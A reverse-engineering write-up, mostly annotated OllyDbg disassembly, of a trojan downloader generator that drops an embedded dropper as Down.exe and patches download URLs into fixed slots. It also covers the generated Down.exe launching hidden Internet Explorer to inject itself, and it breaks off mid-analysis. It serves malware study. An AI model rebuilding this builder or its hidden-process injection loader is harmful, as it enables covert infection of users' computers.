00455B6C /. 55 push ebp ; button click handler: dumps the HOOKMM resource to Down.exe and patches the entered URLs into it
00455B6D |. 8BEC mov ebp,esp
00455B6F |. B9 13000000 mov ecx,13 ; 0x13 iterations x 2 dwords = 0x98 bytes of zeroed locals (lowest slot used below is [ebp-98])
00455B74 |> 6A 00 /push 0
00455B76 |. 6A 00 |push 0
00455B78 |. 49 |dec ecx
00455B79 |.^ 75 F9 \jnz short 1_.00455B74
00455B7B |. 51 push ecx
00455B7C |. 53 push ebx
00455B7D |. 56 push esi
00455B7E |. 57 push edi
00455B7F |. 8BD8 mov ebx,eax ; ebx = Self (first argument arrives in eax, Delphi-style register convention)
00455B81 |. 33C0 xor eax,eax
00455B83 |. 55 push ebp
00455B84 |. 68 BF614500 push 1_.004561BF ; SEH handler: try/finally frame that frees the string temporaries on exit
00455B89 |. 64:FF30 push dword ptr fs:[eax]
00455B8C |. 64:8920 mov dword ptr fs:[eax],esp
00455B8F |. 8D55 D8 lea edx,dword ptr ss:[ebp-28]
00455B92 |. 8B83 10030000 mov eax,dword ptr ds:[ebx+310] ; control at [Self+310] -- the first URL edit box, per the author's trace
00455B98 |. E8 8BEEFDFF call 1_.00434A28 ; read its text into the string at [ebp-28]
00455B9D |. 8B45 D8 mov eax,dword ptr ss:[ebp-28] ; URL from the first edit box -> eax
00455BA0 |. 8D55 DC lea edx,dword ptr ss:[ebp-24]
00455BA3 |. E8 AC21FBFF call 1_.00407D54 ; copy/convert it into [ebp-24] (exact semantics of this helper are not shown)
00455BA8 |. 837D DC 00 cmp dword ptr ss:[ebp-24],0 ; empty? (a nil string pointer is the empty string)
00455BAC |. 75 18 jnz short 1_.00455BC6
00455BAE |. 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
00455BB0 |. 68 D0614500 push 1_.004561D0 ; |Title = "提示信息" ("Notice")
00455BB5 |. 68 DC614500 push 1_.004561DC ; |Text = "必须输入一个下载地址" ("A download URL must be entered")
00455BBA |. 6A 00 push 0 ; |hOwner = NULL
00455BBC |. E8 5B0BFBFF call <jmp.&user32.MessageBoxA> ; \MessageBoxA
Clearly, the code above requires a download URL: if the first edit box yields an empty string after the conversion at 00455BA3, the message box is shown and the handler jumps straight to its common exit at 00456125.
00455BC1 |. E9 5F050000 jmp 1_.00456125 ; -> common exit of the handler
00455BC6 |> 8D55 D4 lea edx,dword ptr ss:[ebp-2C]
00455BC9 |. 8B83 FC020000 mov eax,dword ptr ds:[ebx+2FC] ; control at [Self+2FC] -- the label that displays HTTP://WWW.98EXE.COM
00455BCF |. E8 54EEFDFF call 1_.00434A28 ; read its caption into [ebp-2C]
00455BD4 |. 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
00455BD7 |. 8B15 3C824500 mov edx,dword ptr ds:[45823C] ; 1_.00457E38 -> the expected caption, kept in a global
00455BDD |. 8B12 mov edx,dword ptr ds:[edx]
00455BDF |. E8 C0E7FAFF call 1_.004043A4 ; string compare; ZF set when equal
00455BE4 74 22 je short 1_.00455C08 ; caption intact -> carry on
00455BE6 |. A1 2C814500 mov eax,dword ptr ds:[45812C]
00455BEB |. 8B00 mov eax,dword ptr ds:[eax]
00455BED |. E8 2E2BFDFF call 1_.00428720 ; anti-tamper path: "the program has been modified, please use the genuine version"
This is the anti-tamper check: the caption of the label at [ebx+2FC] (the one reading HTTP://WWW.98EXE.COM) is compared with a string kept in a global, and if they differ the routine at 00428720 shows "the program has been modified, please use the genuine version". Editing that label text is enough to trip it.
................................................................................................
... code that I consider unimportant is omitted here ...
................................................................................................
00455C71 |. 8BC6 mov eax,esi ; esi = the save-dialog object (set up in the omitted code)
00455C73 |. E8 E41CFDFF call 1_.0042795C
00455C78 |. 8D46 78 lea eax,dword ptr ds:[esi+78]
00455C7B |. BA FC614500 mov edx,1_.004561FC ; ASCII "Down.exe"
00455C80 |. E8 67E3FAFF call 1_.00403FEC ; [esi+78] := "Down.exe" -- default output file name
00455C85 |. 8D46 74 lea eax,dword ptr ds:[esi+74]
00455C88 |. BA 10624500 mov edx,1_.00456210 ; ASCII "exe"
00455C8D |. E8 5AE3FAFF call 1_.00403FEC ; [esi+74] := "exe" -- looks like the default extension rather than a filter
00455C92 |. 8D46 70 lea eax,dword ptr ds:[esi+70]
00455C95 |. BA 1C624500 mov edx,1_.0045621C ; string contents not shown in the listing (probably the filter text)
00455C9A |. E8 4DE3FAFF call 1_.00403FEC ; [esi+70] := that string
00455C9F |. 8BC6 mov eax,esi
00455CA1 |. 8B10 mov edx,dword ptr ds:[eax]
00455CA3 |. FF52 3C call dword ptr ds:[edx+3C] ; virtual call: show the "save the generated trojan as..." dialog
00455CA6 |. 84C0 test al,al ; al = 0 when the user cancels
00455CA8 |. 0F84 77040000 je 1_.00456125 ; cancelled -> exit without writing anything
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
... code that I consider unimportant is omitted here ...
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
00455E06 |. 6A 0A push 0A ; /ResourceType = RT_RCDATA
00455E08 |. 68 38624500 push 1_.00456238 ; |ResourceName = "HOOKMM"
00455E0D |. A1 64964500 mov eax,dword ptr ds:[459664] ; |hModule is read from a global (presumably Delphi's HInstance), not a literal NULL
00455E12 |. 50 push eax ; |hModule (OllyDbg displayed NULL at trace time)
00455E13 |. E8 B401FBFF call <jmp.&kernel32.FindResourceA> ; \FindResourceA
FindResourceA(hModule, "HOOKMM", RT_RCDATA) looks up the RCDATA resource named HOOKMM. Note that hModule is loaded from the global at 459664 (Delphi's HInstance, presumably) — i.e. the generator's own module; OllyDbg's "=> NULL" annotation is only what it displayed at trace time.
00455E18 |. 8BF0 mov esi,eax ; esi = HRSRC
00455E1A |. 85F6 test esi,esi
00455E1C |. 0F84 03030000 je 1_.00456125 ; resource not found -> exit
00455E22 |. 56 push esi ; /hResource
00455E23 |. A1 64964500 mov eax,dword ptr ds:[459664] ; |same module handle as for FindResourceA
00455E28 |. 50 push eax ; |hModule
00455E29 |. E8 1E03FBFF call <jmp.&kernel32.SizeofResource> ; \SizeofResource
SizeofResource returns the size of the resource (0x4A00 = 18944 bytes in the trace); a size of zero aborts the whole operation.
00455E2E |. 8945 F8 mov dword ptr ss:[ebp-8],eax ; [ebp-8] = resource size (0x4A00 = 18944 bytes when traced)
00455E31 |. 837D F8 00 cmp dword ptr ss:[ebp-8],0
00455E35 |. 0F84 EA020000 je 1_.00456125 ; zero size -> exit
00455E3B |. 56 push esi ; /hResource=47c820
00455E3C |. A1 64964500 mov eax,dword ptr ds:[459664] ; |
00455E41 |. 50 push eax ; |hModule
00455E42 |. E8 AD02FBFF call <jmp.&kernel32.LoadResource> ; \LoadResource
LoadResource loads the resource into memory; a NULL result aborts.
00455E47 |. 85C0 test eax,eax
00455E49 |. 0F84 D6020000 je 1_.00456125 ; load failed -> exit
00455E4F |. 50 push eax ; /hResource (HGLOBAL returned by LoadResource)
00455E50 |. E8 A702FBFF call <jmp.&kernel32.LockResource> ; \LockResource -> pointer to the resource bytes
LockResource returns a pointer to the resource bytes (checked for NULL below).
00455E55 |. 8945 FC mov dword ptr ss:[ebp-4],eax ; [ebp-4] = pointer to the HOOKMM bytes
00455E58 |. 837D FC 00 cmp dword ptr ss:[ebp-4],0
00455E5C |. 0F84 C3020000 je 1_.00456125 ; NULL -> exit
00455E62 |. 6A 00 push 0 ; /hTemplateFile = NULL
00455E64 |. 68 80000000 push 80 ; |Attributes = FILE_ATTRIBUTE_NORMAL
00455E69 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS -- an existing file at this path is truncated without asking
00455E6B |. 6A 00 push 0 ; |pSecurity = NULL
00455E6D |. 6A 02 push 2 ; |ShareMode = FILE_SHARE_WRITE
00455E6F |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
00455E74 |. 57 push edi ; |FileName -- presumably the path chosen in the save dialog (edi is set in the omitted code)
00455E75 |. E8 2201FBFF call <jmp.&kernel32.CreateFileA> ; \CreateFileA
CreateFileA creates the output file — Down.exe by default, at the path chosen in the save dialog — with CREATE_ALWAYS, so an existing file at that path is silently truncated. A return of INVALID_HANDLE_VALUE (-1) aborts.
00455E7A |. 8BF0 mov esi,eax ; esi = hFile (the register that held HRSRC is reused)
00455E7C |. 83FE FF cmp esi,-1 ; INVALID_HANDLE_VALUE?
00455E7F |. 0F84 A0020000 je 1_.00456125 ; could not create the file -> exit
00455E85 |. 6A 00 push 0 ; /pOverlapped = NULL
00455E87 |. 8D45 F4 lea eax,dword ptr ss:[ebp-C] ; |
00455E8A |. 50 push eax ; |pBytesWritten -> [ebp-C]
00455E8B |. 8B45 F8 mov eax,dword ptr ss:[ebp-8] ; |
00455E8E |. 50 push eax ; |nBytesToWrite = resource size (0x4A00)
00455E8F |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |
00455E92 |. 50 push eax ; |Buffer = resource bytes
00455E93 |. 56 push esi ; |hFile
00455E94 |. E8 DB02FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile -- writes the embedded dropper out verbatim; neither the result nor [ebp-C] is checked
WriteFile dumps the whole HOOKMM resource (0x4A00 bytes) into the new file: the resource is the raw dropper executable. Neither the return value nor the byte count stored at [ebp-C] is checked, so a short write would go unnoticed and the patching below would proceed anyway.
00455E99 |. 6A 0A push 0A ; /Timeout = 10. ms
00455E9B |. E8 146BFBFF call <jmp.&kernel32.Sleep> ; \Sleep -- 10 ms pause before patching; no purpose for it is visible in the code
Sleep for 10 ms. Nothing visible depends on this pause (the file handle is synchronous), so its purpose is not apparent from the code.
00455EA0 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455EA2 |. 6A 00 push 0 ; |pOffsetHi = NULL
00455EA4 |. 68 CC2A0000 push 2ACC ; |OffsetLo = 2ACC -- first URL slot inside the dropper image
00455EA9 |. 56 push esi ; |hFile
00455EAA |. E8 8D02FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
SetFilePointer moves to file offset 0x2ACC — the first URL slot inside the embedded dropper.
00455EAF |. 8B45 F0 mov dword ptr ss:[ebp-10] ; first URL (text of the first edit box)
00455EB2 |. E8 A1E3FAFF call 1_.00404258 ; eax = Length(url)
00455EB7 |. BA 40000000 mov edx,40
00455EBC |. 2BD0 sub edx,eax ; edx = 0x40 - Length: padding needed for a 64-char field (goes negative for a URL longer than 64 chars -- never checked)
00455EBE |. 8D4D 88 lea ecx,dword ptr ss:[ebp-78]
00455EC1 |. 33C0 xor eax,eax
00455EC3 |. E8 80E7FAFF call 1_.00404648 ; [ebp-78] := edx padding characters (eax = 0 suggests NUL bytes; helper semantics inferred from usage)
00455EC8 |. 8B4D 88 mov ecx,dword ptr ss:[ebp-78]
00455ECB |. 8D45 8C lea eax,dword ptr ss:[ebp-74]
00455ECE |. 8B55 F0 mov edx,dword ptr ss:[ebp-10]
00455ED1 |. E8 CEE3FAFF call 1_.004042A4 ; [ebp-74] := url + padding
00455ED6 |. 8B45 8C mov eax,dword ptr ss:[ebp-74]
00455ED9 |. E8 7AE5FAFF call 1_.00404458 ; -> NUL-terminated PChar
00455EDE |. 6A 00 push 0 ; /pOverlapped = NULL
00455EE0 |. 8D55 F4 lea edx,dword ptr ss:[ebp-C] ; |
00455EE3 |. 52 push edx ; |pBytesWritten
00455EE4 |. 6A 41 push 41 ; |nBytesToWrite = 41 (65.) -- the 64-char field plus its terminating NUL
00455EE6 |. 50 push eax ; |buffer = padded URL (traced as http://1111111/*.*.exe)
00455EE7 |. 56 push esi ; |hFile
00455EE8 |. E8 8702FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile -- overwrite slot 1 in place
This writes the first URL into the file. The helpers above (00404258, 00404648, 004042A4, 00404458 — by their use, Delphi's string-length, fill, concatenate and string-to-PChar routines; inferred, not confirmed) pad the URL to 0x40 = 64 characters and convert it to a NUL-terminated buffer, and exactly 0x41 bytes are written: the 64-character field plus its terminator. Nothing checks that the URL fits: for anything longer than 64 characters edx goes negative while the write stays a fixed 0x41 bytes, so the slot would presumably end up truncated and without a terminating NUL.
00455EED |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455EEF |. 6A 00 push 0 ; |pOffsetHi = NULL
00455EF1 |. 68 182B0000 push 2B18 ; |OffsetLo = 2B18 -- dead seek: replaced by the next SetFilePointer before any write
00455EF6 |. 56 push esi ; |hFile
00455EF7 |. E8 4002FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
Seeks to 0x2B18 — but the very next call seeks to 0x2B10 before anything is written, so this seek has no effect on the output file.
00455EFC |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455EFE |. 6A 00 push 0 ; |pOffsetHi = NULL
00455F00 |. 68 102B0000 push 2B10 ; |OffsetLo = 2B10 -- second URL slot (0x44 bytes after the first)
00455F05 |. 56 push esi ; |hFile
00455F06 |. E8 3102FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00455F0B |. 8B45 EC mov eax,dword ptr ss:[ebp-14] ; second URL (text of the second edit box)
00455F0E |. E8 45E3FAFF call 1_.00404258 ; eax = Length(url)
00455F13 |. BA 40000000 mov edx,40
00455F18 |. 2BD0 sub edx,eax ; edx = 0x40 - Length (padding; unchecked for Length > 0x40)
00455F1A |. 8D4D 80 lea ecx,dword ptr ss:[ebp-80]
00455F1D |. 33C0 xor eax,eax
00455F1F |. E8 24E7FAFF call 1_.00404648 ; [ebp-80] := padding
00455F24 |. 8B4D 80 mov ecx,dword ptr ss:[ebp-80]
00455F27 |. 8D45 84 lea eax,dword ptr ss:[ebp-7C]
00455F2A |. 8B55 EC mov edx,dword ptr ss:[ebp-14]
00455F2D |. E8 72E3FAFF call 1_.004042A4 ; [ebp-7C] := url + padding
00455F32 |. 8B45 84 mov eax,dword ptr ss:[ebp-7C] ; padded URL
00455F35 |. E8 1EE5FAFF call 1_.00404458 ; -> NUL-terminated PChar
00455F3A |. 6A 00 push 0 ; /pOverlapped = NULL
00455F3C |. 8D55 F4 lea edx,dword ptr ss:[ebp-C] ; |
00455F3F |. 52 push edx ; |pBytesWritten
00455F40 |. 6A 41 push 41 ; |nBytesToWrite = 41 (65.)
00455F42 |. 50 push eax ; |Buffer
00455F43 |. 56 push esi ; |hFile
00455F44 |. E8 2B02FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile -- overwrite slot 2
The second URL you entered is written the same way. Before each slot there is a seek to 8 bytes past the slot start (0x2B18, 0x2B5C, 0x2BA0, 0x2BE4) that is immediately replaced by the seek to the slot itself (0x2B10, 0x2B54, 0x2B98, 0x2BDC); I read that 8-byte gap as the length of "http://" plus a terminator, but the code never actually writes at the first position, so it is a dead seek. If you open the program in a hex editor you will find filler such as
CXXXXXXXXXXXXXXXXXXXXXXXXXXXXX, DXXXXXXXXX... at these positions — the placeholder contents of the slots in the embedded dropper.
00455F49 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455F4B |. 6A 00 push 0 ; |pOffsetHi = NULL
00455F4D |. 68 5C2B0000 push 2B5C ; |OffsetLo = 2B5C -- dead seek, superseded by the next one
00455F52 |. 56 push esi ; |hFile
00455F53 |. E8 E401FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00455F58 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455F5A |. 6A 00 push 0 ; |pOffsetHi = NULL
00455F5C |. 68 542B0000 push 2B54 ; |OffsetLo = 2B54 -- third URL slot
00455F61 |. 56 push esi ; |hFile
00455F62 |. E8 D501FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00455F67 |. 8B45 E8 mov eax,dword ptr ss:[ebp-18] ; third URL (read from its edit box in the omitted code)
00455F6A |. E8 E9E2FAFF call 1_.00404258 ; eax = Length(url)
00455F6F |. BA 40000000 mov edx,40
00455F74 |. 2BD0 sub edx,eax ; edx = 0x40 - Length (padding; unchecked for Length > 0x40)
00455F76 |. 8D8D 78FFFFFF lea ecx,dword ptr ss:[ebp-88]
00455F7C |. 33C0 xor eax,eax
00455F7E |. E8 C5E6FAFF call 1_.00404648 ; [ebp-88] := padding
00455F83 |. 8B8D 78FFFFFF mov ecx,dword ptr ss:[ebp-88]
00455F89 |. 8D85 7CFFFFFF lea eax,dword ptr ss:[ebp-84]
00455F8F |. 8B55 E8 mov edx,dword ptr ss:[ebp-18]
00455F92 |. E8 0DE3FAFF call 1_.004042A4 ; [ebp-84] := url + padding
00455F97 |. 8B85 7CFFFFFF mov eax,dword ptr ss:[ebp-84]
00455F9D |. E8 B6E4FAFF call 1_.00404458 ; -> NUL-terminated PChar
00455FA2 |. 6A 00 push 0 ; /pOverlapped = NULL
00455FA4 |. 8D55 F4 lea edx,dword ptr ss:[ebp-C] ; |
00455FA7 |. 52 push edx ; |pBytesWritten
00455FA8 |. 6A 41 push 41 ; |nBytesToWrite = 41 (65.)
00455FAA |. 50 push eax ; |Buffer
00455FAB |. 56 push esi ; |hFile
00455FAC |. E8 C301FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile -- overwrite slot 3
00455FB1 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455FB3 |. 6A 00 push 0 ; |pOffsetHi = NULL
00455FB5 |. 68 A02B0000 push 2BA0 ; |OffsetLo = 2BA0 -- dead seek, superseded by the next one
00455FBA |. 56 push esi ; |hFile
00455FBB |. E8 7C01FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00455FC0 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00455FC2 |. 6A 00 push 0 ; |pOffsetHi = NULL
00455FC4 |. 68 982B0000 push 2B98 ; |OffsetLo = 2B98 -- fourth URL slot
00455FC9 |. 56 push esi ; |hFile
00455FCA |. E8 6D01FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00455FCF |. 8B45 E4 mov eax,dword ptr ss:[ebp-1C] ; fourth URL
00455FD2 |. E8 81E2FAFF call 1_.00404258 ; eax = Length(url)
00455FD7 |. BA 40000000 mov edx,40
00455FDC |. 2BD0 sub edx,eax ; edx = 0x40 - Length (padding; unchecked)
00455FDE |. 8D8D 70FFFFFF lea ecx,dword ptr ss:[ebp-90]
00455FE4 |. 33C0 xor eax,eax
00455FE6 |. E8 5DE6FAFF call 1_.00404648 ; [ebp-90] := padding
00455FEB |. 8B8D 70FFFFFF mov ecx,dword ptr ss:[ebp-90]
00455FF1 |. 8D85 74FFFFFF lea eax,dword ptr ss:[ebp-8C]
00455FF7 |. 8B55 E4 mov edx,dword ptr ss:[ebp-1C]
00455FFA |. E8 A5E2FAFF call 1_.004042A4 ; [ebp-8C] := url + padding
00455FFF |. 8B85 74FFFFFF mov eax,dword ptr ss:[ebp-8C]
00456005 |. E8 4EE4FAFF call 1_.00404458 ; -> NUL-terminated PChar
0045600A |. 6A 00 push 0 ; /pOverlapped = NULL
0045600C |. 8D55 F4 lea edx,dword ptr ss:[ebp-C] ; |
0045600F |. 52 push edx ; |pBytesWritten
00456010 |. 6A 41 push 41 ; |nBytesToWrite = 41 (65.)
00456012 |. 50 push eax ; |Buffer
00456013 |. 56 push esi ; |hFile
00456014 |. E8 5B01FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile -- overwrite slot 4
00456019 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
0045601B |. 6A 00 push 0 ; |pOffsetHi = NULL
0045601D |. 68 E42B0000 push 2BE4 ; |OffsetLo = 2BE4 -- dead seek, superseded by the next one
00456022 |. 56 push esi ; |hFile
00456023 |. E8 1401FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00456028 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
0045602A |. 6A 00 push 0 ; |pOffsetHi = NULL
0045602C |. 68 DC2B0000 push 2BDC ; |OffsetLo = 2BDC -- fifth URL slot
00456031 |. 56 push esi ; |hFile
00456032 |. E8 0501FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00456037 |. 8B45 E0 mov eax,dword ptr ss:[ebp-20] ; fifth URL
0045603A |. E8 19E2FAFF call 1_.00404258 ; eax = Length(url)
0045603F |. BA 40000000 mov edx,40
00456044 |. 2BD0 sub edx,eax ; edx = 0x40 - Length (padding; unchecked)
00456046 |. 8D8D 68FFFFFF lea ecx,dword ptr ss:[ebp-98]
0045604C |. 33C0 xor eax,eax
0045604E |. E8 F5E5FAFF call 1_.00404648 ; [ebp-98] := padding
00456053 |. 8B8D 68FFFFFF mov ecx,dword ptr ss:[ebp-98]
00456059 |. 8D85 6CFFFFFF lea eax,dword ptr ss:[ebp-94]
0045605F |. 8B55 E0 mov edx,dword ptr ss:[ebp-20]
00456062 |. E8 3DE2FAFF call 1_.004042A4 ; [ebp-94] := url + padding
00456067 |. 8B85 6CFFFFFF mov eax,dword ptr ss:[ebp-94]
0045606D |. E8 E6E3FAFF call 1_.00404458 ; -> NUL-terminated PChar
00456072 |. 6A 00 push 0 ; /pOverlapped = NULL
00456074 |. 8D55 F4 lea edx,dword ptr ss:[ebp-C] ; |
00456077 |. 52 push edx ; |pBytesWritten
00456078 |. 6A 41 push 41 ; |nBytesToWrite = 41 (65.)
0045607A |. 50 push eax ; |Buffer
0045607B |. 56 push esi ; |hFile
0045607C |. E8 F300FBFF call <jmp.&kernel32.WriteFile> ; \WriteFile -- overwrite slot 5
00456081 |. 6A 00 push 0 ; /Origin = FILE_BEGIN
00456083 |. 6A 00 push 0 ; |pOffsetHi = NULL
00456085 |. 68 282C0000 push 2C28 ; |OffsetLo = 2C28 -- nothing is written after this seek
0045608A |. 56 push esi ; |hFile
0045608B |. E8 AC00FBFF call <jmp.&kernel32.SetFilePointer> ; \SetFilePointer
00456090 |. 56 push esi ; /hObject = hFile
00456091 |. E8 EEFEFAFF call <jmp.&kernel32.CloseHandle> ; \CloseHandle
00456096 |. 6A 40 push 40 ; /Style = MB_OK|MB_ICONASTERISK|MB_APPLMODAL
00456098 |. 68 40624500 push 1_.00456240 ; |Title = "提示" ("Notice")
0045609D |. 68 48624500 push 1_.00456248 ; |Text = "配置文件成功" ("File configured successfully") -- shown regardless of whether the writes succeeded
004560A2 |. 6A 00 push 0 ; |hOwner = NULL
004560A4 |. E8 7306FBFF call <jmp.&user32.MessageBoxA> ; \MessageBoxA
=====================================================================================================
When I started the analysis I did not know how to extract the HOOKMM resource — Resource Hacker reported it as compressed. Thinking it over, HOOKMM must be the Down.exe we generate: the program's job is to write the HOOKMM resource out as Down.exe
and then patch the URLs we entered into that file at fixed offsets.
At that point everything fell into place, and I expect it did for you too.
=====================================================================================================
004560A9 |. 8B83 04030000 mov eax,dword ptr ds:[ebx+304] ; control at [Self+304] -- presumably the "compress" checkbox
004560AF |. 8B10 mov edx,dword ptr ds:[eax]
004560B1 |. FF92 C8000000 call dword ptr ds:[edx+C8] ; virtual getter; al = its state
004560B7 |. 84C0 test al,al
004560B9 |. 74 6A je short 1_.00456125 ; not selected -> exit
004560BB |. B9 60624500 mov ecx,1_.00456260 ; ASCII "Upack.bat"
004560C0 |. BA 74624500 mov edx,1_.00456274 ; ASCII "UPXKMM"
004560C5 |. B8 84624500 mov eax,1_.00456284 ; ASCII "RCDUPX"
004560CA |. E8 8DF9FFFF call 1_.00455A5C ; helper taking three strings (resource names and the batch file name); presumably drops resources to files, al = success
004560CF |. 84C0 test al,al ; result of the helper -- the "was compression selected" test is the virtual call above
////////////////////////////////////////////////////////////////////////////////////////////////////
I will not analyse the code below in detail. Thinking laterally: UPX is driven from the command line as "UPX.EXE <options> <target file>",
so my guess is that the program also carries UPX.exe as a resource (the names passed at 004560BB–004560C5 are "RCDUPX", "UPXKMM" and "Upack.bat"); if compression is selected it drops UPX.exe and Upack.bat (probably with the hidden attribute set) and then runs the batch file.
Upack.bat presumably looks something like this (inferred, not verified against the actual resource):
UPX.EXE <options> <target file>
del upx.exe
del %1
////////////////////////////////////////////////////////////////////////////////////////////////////
004560D1 |. 74 52 je short 1_.00456125 ; helper failed -> exit
004560D3 |. 6A 06 push 6 ; ShellExecuteA nShowCmd = 6 (SW_MINIMIZE)
004560D5 |. 6A 00 push 0 ; ShellExecuteA lpDirectory = NULL
004560D7 |. 68 94624500 push 1_.00456294 ; three pieces for the concatenation below (contents of 00456294 not shown)
004560DC |. FF35 0C9C4500 push dword ptr ds:[459C0C] ; global string -- plausibly the chosen output file name
004560E2 |. 68 94624500 push 1_.00456294
004560E7 |. 8D85 64FFFFFF lea eax,dword ptr ss:[ebp-9C]
004560ED |. BA 03000000 mov edx,3 ; edx = number of pieces
004560F2 |. E8 21E2FAFF call 1_.00404318 ; [ebp-9C] := concatenation of the three pushed strings
004560F7 |. 8B85 64FFFFFF mov eax,dword ptr ss:[ebp-9C]
004560FD |. E8 56E3FAFF call 1_.00404458 ; -> PChar
00456102 |. 50 push eax ; |Parameters = the concatenated string
00456103 |. 68 98624500 push 1_.00456298 ; |FileName = "Upack.bat"
00456108 |. 6A 00 push 0 ; |Operation = NULL
0045610A |. 6A 00 push 0 ; |hWnd = NULL
0045610C |. E8 1702FDFF call <jmp.&shell32.ShellExecuteA> ; \ShellExecuteA -- runs the dropped batch file; return value not checked
00456111 |. 68 E8030000 push 3E8 ; /Timeout = 1000. ms
00456116 |. E8 9968FBFF call <jmp.&kernel32.Sleep> ; \Sleep -- fixed 1 s wait instead of waiting on the batch process
0045611B |. B8 60624500 mov eax,1_.00456260 ; ASCII "Upack.bat" (the handler continues past this listing)
With that idea in hand, I went on to analyse the generated Down.exe.
The generated Down.exe (note the unusual image base, 0x1314xxxx — it matters for the injection technique below):
13143A24 Dow> $ 55 push ebp ; Down.exe entry routine: for each of five URL slots, launch IE and inject this image into it
13143A25 . 8BEC mov ebp,esp
13143A27 . 81C4 F0FEFFFF add esp,-110 ; 0x110-byte local at [ebp-110]; its first byte is read as a length below, i.e. a ShortString
13143A2D . B8 EC391413 mov eax,Down.131439EC
13143A32 . E8 81F9FFFF call Down.131433B8 ; runtime initialisation (Delphi-style, eax = init table)
13143A37 . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143A3D . 8B15 A0401413 mov edx,dword ptr ds:[131440A0] ; first URL slot (the field the generator patched)
13143A43 . E8 80ECFFFF call Down.131426C8 ; copy it into the local ShortString
13143A48 . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143A4E . BA 503B1413 mov edx,Down.13143B50 ; constant string (contents not shown) -- presumably the unfilled placeholder
13143A53 . 33C9 xor ecx,ecx
13143A55 . 8A08 mov cl,byte ptr ds:[eax] ; ecx = length byte + 1
13143A57 . 41 inc ecx
13143A58 . E8 27EBFFFF call Down.13142584 ; compare; ZF set when equal
13143A5D . 74 0F je short Down.13143A6E ; slot equals the constant -> nothing to download, skip it
13143A5F . A1 A0401413 mov eax,dword ptr ds:[131440A0]
13143A64 . A3 78561413 mov dword ptr ds:[13145678],eax ; store the URL in a global (presumably read by the code that runs inside IE)
13143A69 . E8 B6FEFFFF call Down.13143924 ; launch IE and inject (analysed below)
{
13143924 /$ 55 push ebp ; launch a hidden iexplore.exe and inject this image into it
13143925 |. 8BEC mov ebp,esp
13143927 |. 83C4 F8 add esp,-8 ; [ebp-8] = IE path string, [ebp-4] = IE process id (never initialised)
1314392A |. 53 push ebx
1314392B |. 33C0 xor eax,eax
1314392D |. 8945 F8 mov dword ptr ss:[ebp-8],eax ; only [ebp-8] is zeroed
13143930 |. 33C0 xor eax,eax
13143932 |. 55 push ebp
13143933 |. 68 B0391413 push Down.131439B0 ; SEH frame: try/finally that frees [ebp-8] on exit
13143938 |. 64:FF30 push dword ptr fs:[eax]
1314393B |. 64:8920 mov dword ptr fs:[eax],esp
1314393E |. 6A 00 push 0 ; uCmdShow for the WinExec below = SW_HIDE (pushed early; the next calls pass arguments in registers)
13143940 |. 8D45 F8 lea eax,dword ptr ss:[ebp-8]
13143943 |. E8 E4FBFFFF call Down.1314352C ; [ebp-8] := IE path from the App Paths registry key (per the author's trace)
Stepping into this call shows that the program reads the full path of Internet Explorer from the registry key "Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE".
13143948 |. 8B45 F8 mov eax,dword ptr ss:[ebp-8] ; full path of iexplore.exe -> eax
1314394B |. E8 18F7FFFF call Down.13143068 ; -> PChar
13143950 |. 50 push eax ; |CmdLine
13143951 |. E8 7EFBFFFF call <jmp.&kernel32.WinExec> ; \WinExec(path, SW_HIDE) -- IE starts with no visible window; result not checked
WinExec("c:\...\iexplore.exe", SW_HIDE): the push 0 at 1314393E is the uCmdShow argument, so Internet Explorer is started hidden. The return value is not checked.
13143956 |. 68 F4010000 push 1F4 ; /Timeout = 500. ms
1314395B |. E8 5CFBFFFF call <jmp.&kernel32.Sleep> ; \Sleep -- fixed wait for the IE window to appear
Sleep(0x1F4): wait 500 ms for the IE window to come up.
13143960 |. 8D45 FC lea eax,dword ptr ss:[ebp-4]
13143963 |. 50 push eax ; /pProcessID -> [ebp-4]
13143964 |. 6A 00 push 0 ; |/Title = NULL
13143966 |. 68 BC391413 push Down.131439BC ; ||Class = "IEFrame" -- any IE top-level window, not necessarily the one just started
1314396B |. E8 74FBFFFF call <jmp.&user32.FindWindowA> ; |\FindWindowA (NULL result not checked)
13143970 |. 50 push eax ; |hWnd
13143971 |. E8 76FBFFFF call <jmp.&user32.GetWindowThreadProcessId> ; \GetWindowThreadProcessId
FindWindowA("IEFrame", NULL) obtains a handle to an IE top-level window — any IE window, not necessarily the instance just launched — and GetWindowThreadProcessId stores its process ID in [ebp-4]. Neither result is checked, and [ebp-4] is never initialised (only [ebp-8] is zeroed in the prologue), so if no IE window exists after 500 ms OpenProcess may receive whatever happened to be in that stack slot.
